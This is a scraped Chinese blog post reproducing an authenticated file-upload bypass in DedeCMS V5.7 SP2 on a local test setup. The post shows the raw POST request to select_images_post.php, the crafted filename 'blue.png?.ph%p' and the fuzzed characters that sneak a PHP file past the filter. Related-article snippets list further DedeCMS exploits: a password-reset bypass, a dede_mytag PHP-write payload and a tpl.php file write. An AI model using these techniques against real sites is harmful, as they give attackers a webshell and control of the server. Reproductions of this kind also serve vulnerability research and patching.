DedeCMS_V5.7-SP2后台getshell

最新推荐文章于 2022-04-04 17:04:41 发布
最新推荐文章于 2022-04-04 17:04:41 发布
阅读量315 收藏
点赞数
文章标签: php apache laravel wordpress thinkphp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/M110K/article/details/112486728
版权

测试环境

Windows+PHPStudy(php5.5.38+Apache)

测试程序

http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7-UTF8-SP2.tar.gz

测试过程

下载官方程序包,安装好、进后台---内容管理---商品---添加文档

2017-10-09.png

抓包

POST /DedeCMS-V5.7-UTF8-SP2/include/dialog/select_images_post.php?CKEditor=body&CKEditorFuncNum=2&langCode=zh-cn HTTP/1.1
Host: 127.0.0.1
Content-Length: 2490
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytQSXCJKY9KidXbNm
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
DNT: 1
Referer: http://127.0.0.1/DedeCMS-V5.7-UTF8-SP2/dede/archives_add.php?channelid=6&cid=0
Accept-Language: zh-CN,zh;q=0.8
Cookie: bdshare_firstime=1498015490095; 0ju_cookietime=2592000;
Connection: close

------WebKitFormBoundarytQSXCJKY9KidXbNm
Content-Disposition: form-data; name="upload"; filename="blue.png"
Content-Type: image/png

修改filename: blue.png?.ph%p 提交

2.png

Fuzzing

现在对后缀名进行fuzz,特殊字符

! @ # $ % ^ & * ( ) < > ? / , ; : ' " [ ] { } + = - ~ `
  1. 【?】.ph%p
    3.png

对这个位置进行fuzz发现任意特殊字符都可以绕过上传php

  1. ?.ph【%】p
    4.png

测试发现,系统对这个位置的字符会进行url编码,并且会吃掉【%】
【<】--->【%3c】--->吃掉%--->php

360截图18720125519945.png
KEY0NE
关注
Dedecms 最新版漏洞收集并复现学习
墨痕诉清风的博客
09-30 5475
在用户密码重置功能处,php存在弱类型比较,导致如果用户没有设置密保问题的情况下可以绕过验证密保问题,直接修改密码(管理员账户默认不设置密保问题)。这么一次过滤,直接粗暴的将一些特殊字符替换为空,那么我们就可以通过特殊字符绕过上面的全局文件名不能包含php字符的限制,比如文件名为。这样,由于index.php中我们可以控制返回一个输入值和这个输入值经过服务器处理后的md5值。我们可以看到当uid存在值时就会进入我们现在的代码中,当cookie中的last_vid中不存在值为空时,就会将uid值赋予过去,
DEDECMSSHELL EXP
fengling132的专栏
05-02 551
转自:t00ls 网上流传的漏洞exp都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell   _1 U- t( B- F8 c 前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\
Dedecms 5.7 SP2后台getshell
一个安全研究员
07-02 9875
前言 最近也打算研究研究各大cms的漏洞了,正好看到一篇关于dedecms后台getshell的文章,所以也自己动手复现一下,这样以后遇到了也更容易上手。该漏洞涉及的版本是dedecms的最新版吧,下载地址: http://www.dedecms.com/products/dedecms/downloads/ 复现 版本: 我这里测试的是utf8版,这个版本应该不影响。 漏洞位...
DedeCMS-V5.7-UTF8-SP2 下载安装完毕后,前台打开巨慢,后台静态页无法生成巨慢,备忘一下...
anli7767的博客
03-07 544
其他百度到的解决方法全部试过,不是那么回事,经测试如下正解: 1、安装后默认模板的问题,经排查首页模板(templets\default\index.html)发现: 都是其中类似mda的东西拖累的; 2、其他页面也是; 3、生成静态也是,因此卡住了; 4、找到打开此文件; 就是这个网址的问题…… 愉不愉快…… 恶不恶心…… 5、省事的去掉它,或不用默认模板也...
Dedecms V5.7 sp2后台getshell漏洞复现(第一处)
weixin_42558965的博客
09-28 1115
前言:为了简便,试用了phpstudy 下载dedecms V5.7 sp2 使用phpstudy新建网站www.dedtest.com,并将下载的dedecms V5.7 sp2复制到其网站目录下,然后建站 开始复现 漏洞的只要原因是出现在了C:\phpstudy_pro\WWW\www.dedtest.com\dede文件夹下的sys_varifiles.php文件,一下为代码: /*----------------------- 下载文件 function _getfiles() ----------
herewshow#poc#(CVE-2019-8362)Dedecms v5.7 sp2 后台文件上传 getshell1
07-25
1、首先构造一个文件名为1.jpg.php的文件,内容为 2、将该文件进行压缩 3、在常用操作-文件式管理器处上传压缩文件到soft目录下 5、发布预览
CVE-2018-20129-——DedeCMS V5.7 SP2前台文件上传漏洞
玄道的网安博客
12-20 5637
0x01 漏洞概述 Desdev DedeCMS(织梦内容管理系统)是中国卓卓网络(Desdev)科技有限公司的一套开源的集内容发布、编辑、管理检索等于一体的PHP网站内容管理系统(CMS)。 Desdev DedeCMS 5.7 SP2版本中的uploads/include/dialog/select_images_post.php文件存在文件上传漏洞,远程攻击者可利用该漏洞上传并执行任意PH...
dedecmsv5.7sp1 文件包含和变量覆盖漏洞
小饼干的博客
06-28 1028
环境搭建:使用phpstudy,phpstudy版本2016,PHP版本5.4.45,mysql版本5.5.53 dedecms版本5.7 sp1 utf-8版 环境搭建好以后安装dedecms,安装完成以后访问一下 存在漏洞的地方在install/index.php文件中 在29到33行中存在变量覆盖,这段代码的大概意思是依次对_GET,_POST,_COOKIE进行键值分离 例如:_GET传入的参数是id=1,name=nfnf,在第一个foreach中先遍历_GET,此时$_request变为$_g
dedecmsshell
最新发布
08-24
- *1* [Dedecms 5.7 SP2后台getshell](https://blog.csdn.net/he_and/article/details/80890664)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
使用dedecms搭建页面
Cool_php的博客
06-04 704
首先,先在网页中下载DedeCMS-V5.7-UTF8-SP2.tar.gz这个文件,下载完成后解压,解压完之后可以把这个文件夹的名字改成自己需要的名字,在apache中运行文件夹/uploads/dede,这样就可以生成相应的数据库,在织梦网中会出现关于数据库的信息,为了防止木马攻击,需要将生成的数据名和数据表前缀改为属于自己的,完成后就可以进入后台了,并且在织梦内容管理系统中修改 系统/系统基...
CMS V5.7 SP2漏洞复现(CVE-2018-20129)
haoaaao的博客
04-04 4776
0x00 前置 1、CVE中对该漏洞的描述: 在 DedeCMS V5.7 SP2 中发现了一个问题。uploads/include/dialog/select_images_post.php 允许远程攻击者通过双扩展名和修改的“.php”子字符串以及 image/jpeg 内容类型上传和执行任意 PHP 代码,如 filename=1 所示。 jpg.p*hp 值。 2、所需工具 (1)cms网站源码版本:DedeCMS V5.7 SP2 下载链接...
DedeCMS V5.7sp2最新版本parse_str函数SQL注入漏洞
网站安全专家
08-10 3845
织梦dedecms,在整个互联网中许多企业网站,个人网站,优化网站都在使用dede作为整个网站的开发架构,dedecms采用php+mysql数据库的架构来承载整个网站的运行与用户的访问,首页以及栏目页生成html静态化,大大的加快的网站访问速度,以及搜索引擎的友好度,利于百度蜘蛛的抓取,深受广大站长以及网站运营者的喜欢。最近我们发现dedecms漏洞,存在高危的parse_str函数sql注入漏...
ckeditor 上传文件
BI
08-22 7899
参考: http://docs.ckeditor.com/#!/guide/dev_file_browser_api http://docs.ckeditor.com/#!/guide/dev_file_browse_upload环境: ckeditor_4.5.10_full在生成 ckeditor 的时候,像下面那样写: CKEDITOR.replace('editor1',
dedecms V5.7 SP2 web后台getshell
公众号shadow sock7
11-12 5215
https://www.freebuf.com/vuls/164035.html dede/tpl.php任意文件写入漏洞。 条件:已登录后台。 首先访问/dede/tpl.php?action=upload获取token值 访问/dede/tpl.php?filename=&amp;amp;amp;amp;amp;lt;yourname&amp;amp;amp;amp;amp;gt;.lib.php&amp;amp;amp;amp;amp;amp;action=savetagf
Dedecms V5.7 SP2版本漏洞利用
dahege666的博客
03-07 9628
一、环境搭建 系统:Win10(64位) 工具:Phpstudy 源码:DedeCMS-V5.7-GBK-SP2-Full 二、安装phpstudy https://www.xp.cn/download.html 安装完成后.... 三、下载dedecms源码 http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5....
php图片上传不现实路径指向错误,织梦dede开启多站点后上传图片路径出错 临时解决办法...
weixin_36135382的博客
03-10 438
做大站,或者做站群的进修都可能需要用到DEDECMS的多站点功能,但是DEDE的这个功能还有一些问题,比如说图片路径问题,默认图片上传是用的相对路径,启用多站点后,图片路径就不对了,这时我今天搞了半天找到一个临时解决办法,还不能确定是否带来新的问题,仅供大家参考,也希望大家提出宝贵意见。1、打开/include/dialog/select_images_post.php 把$inquery = "...
dedecms-v5.7-utf8-sp2
07-30
dedecms-v5.7-utf8-sp2拥有许多有用的功能,如内容管理、会员管理、模块扩展等。通过dedecms,用户可以方便地创建网站、发布和管理内容,包括文章、图片、音频、视频等。其中,内容管理模块提供了灵活的分类和标签...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值